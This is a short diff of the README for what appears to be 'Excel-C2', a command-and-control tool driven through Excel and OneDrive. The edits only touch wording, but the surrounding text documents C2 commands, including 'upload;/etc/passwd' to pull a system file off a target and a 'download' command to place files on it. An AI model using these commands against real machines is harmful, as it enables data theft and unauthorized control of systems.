grantok/Excel-C2/README.md

 upload;/etc/passwd
  ```

-> NOTE: DO **NOT** add spaces.
+> NOTE: DO **NOT** add spaces around semi-colons.

 #### Download File

 The "download" command will download a file from OneDrive to the target machine.
-The syntax is
+The syntax is:

  ```none
 download;<OneDrive file name>;<remote path>